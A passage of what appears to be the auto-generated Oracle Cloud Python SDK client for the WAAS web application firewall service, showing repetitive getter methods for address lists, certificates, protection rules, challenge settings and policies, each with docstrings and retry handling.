if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def get_address_list(self, address_list_id, **kwargs):
"""
Gets the details of an address list.
:param str address_list_id: (required)
The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_address_list.py.html>`__ to see an example of how to use get_address_list API.
"""
resource_path = "/addressLists/{addressListId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_address_list got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"addressListId": address_list_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AddressList")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AddressList")
def get_certificate(self, certificate_id, **kwargs):
"""
Gets the details of an SSL certificate.
:param str certificate_id: (required)
The `OCID`__ of the SSL certificate used in the WAAS policy. This number is generated when the certificate is added to the policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_certificate.py.html>`__ to see an example of how to use get_certificate API.
"""
resource_path = "/certificates/{certificateId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_certificate got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"certificateId": certificate_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Certificate")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Certificate")
def get_custom_protection_rule(self, custom_protection_rule_id, **kwargs):
"""
Gets the details of a custom protection rule.
:param str custom_protection_rule_id: (required)
The `OCID`__ of the custom protection rule. This number is generated when the custom protection rule is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_custom_protection_rule.py.html>`__ to see an example of how to use get_custom_protection_rule API.
"""
resource_path = "/customProtectionRules/{customProtectionRuleId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_custom_protection_rule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"customProtectionRuleId": custom_protection_rule_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CustomProtectionRule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CustomProtectionRule")
def get_device_fingerprint_challenge(self, waas_policy_id, **kwargs):
"""
Gets the device fingerprint challenge settings in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.DeviceFingerprintChallenge`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_device_fingerprint_challenge.py.html>`__ to see an example of how to use get_device_fingerprint_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/deviceFingerprintChallenge"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_device_fingerprint_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DeviceFingerprintChallenge")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DeviceFingerprintChallenge")
def get_human_interaction_challenge(self, waas_policy_id, **kwargs):
"""
Gets the human interaction challenge settings in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.HumanInteractionChallenge`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_human_interaction_challenge.py.html>`__ to see an example of how to use get_human_interaction_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/humanInteractionChallenge"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_human_interaction_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="HumanInteractionChallenge")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="HumanInteractionChallenge")
def get_js_challenge(self, waas_policy_id, **kwargs):
"""
Gets the JavaScript challenge settings in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.JsChallenge`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_js_challenge.py.html>`__ to see an example of how to use get_js_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/jsChallenge"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_js_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="JsChallenge")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="JsChallenge")
def get_policy_config(self, waas_policy_id, **kwargs):
"""
Gets the configuration of a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.PolicyConfig`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_policy_config.py.html>`__ to see an example of how to use get_policy_config API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/policyConfig"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_policy_config got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PolicyConfig")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PolicyConfig")
def get_protection_rule(self, waas_policy_id, protection_rule_key, **kwargs):
"""
Gets the details of a protection rule in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str protection_rule_key: (required)
The protection rule key.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.ProtectionRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_protection_rule.py.html>`__ to see an example of how to use get_protection_rule API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules/{protectionRuleKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_protection_rule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id,
"protectionRuleKey": protection_rule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ProtectionRule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ProtectionRule")
def get_protection_settings(self, waas_policy_id, **kwargs):
"""
Gets the protection settings in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.ProtectionSettings`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_protection_settings.py.html>`__ to see an example of how to use get_protection_settings API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionSettings"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_protection_settings got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ProtectionSettings")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ProtectionSettings")
def get_waas_policy(self, waas_policy_id, **kwargs):
"""
Gets the details of a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.WaasPolicy`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/get_waas_policy.py.html>`__ to see an example of how to use get_waas_policy API.
"""
resource_path = "/waasPolicies/{waasPolicyId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_waas_policy got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WaasPolicy")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WaasPolicy")
def get_waf_address_rate_limiting(self, waas_policy_id, **kwargs):
"""
Gets the address rate limiting settings of the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
